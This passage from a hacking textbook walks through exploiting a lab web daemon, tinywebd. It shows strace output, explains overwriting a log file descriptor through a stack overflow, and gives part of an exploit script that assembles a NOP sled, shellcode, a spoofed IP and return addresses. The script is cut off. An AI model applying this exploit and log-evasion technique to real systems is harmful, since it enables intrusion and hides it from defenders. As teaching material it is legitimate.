Countermeasures 353strace is used with the -p command-line argument to attach to a running
process. The -e trace=write argument tells strace to only look at write calls.
Once again, the spoofing exploit tool is used in another terminal to connect
and advance execution.reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ps aux | grep tinywebd
root 478 0.0 0.0 1636 420? Ss 23:24 0:00 ./tinywebd
reader 525 0.0 0.0 2880 748 pts/1 R+ 23:24 0:00 grep tinywebd
reader@hacking:~/booksrc $ sudo strace -p 478 -e trace=write
Process 478 attached - interrupt to quit
write(2560, "09/19/2007 23:29:30> ", 21) = -1 EBADF (Bad file descriptor)
write(2560, "From 12.34.56.78:9090 \"GET / HTT".., 47) = -1 EBADF (Bad file descriptor)
Process 478 detached
reader@hacking:~/booksrc $
This output clearly shows the attempts to write to the log file failing.
Normally, we wouldn’t be able to overwrite the logfd variable, since the
client_addr_ptr is in the way. Carelessly mangling this pointer will usually
lead to a crash. But since we’ve made sure this variable points to valid memory
(our injected spoofed address structure), we’re free to overwrite the vari-
ables that lie beyond it. Since the tinyweb daemon redirects standard out to
/dev/null, the next exploit script will overwrite the passed logfd variable
with 1 , for standard output. This will still prevent entries from being written
to the log file but in a much nicer way—without errors.xtool_tinywebd_silent.sh
#!/bin/sh
Silent stealth exploitation tool for tinywebd
also spoofs IP address stored in memory
SPOOFIP=”12.34.56.78"
SPOOFPORT="9090"
if [ -z "$2" ]; then # If argument 2 is blank
echo "Usage: $0
exit
fi
FAKEREQUEST="GET / HTTP/1.1\x00"
FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ')
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
FAKEADDR="\xcf\xf5\xff\xbf" # +15 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=wc -c $1 | cut -f1 -d ' '
echo "shellcode: $1 ($SIZE bytes)"
echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE - 16))
echo "[Fake Request $FR_SIZE] [spoof IP 16] [NOP $ALIGNED_SLED_SIZE] [shellcode $SIZE] [ret
addr 128] [*fake_addr 8]"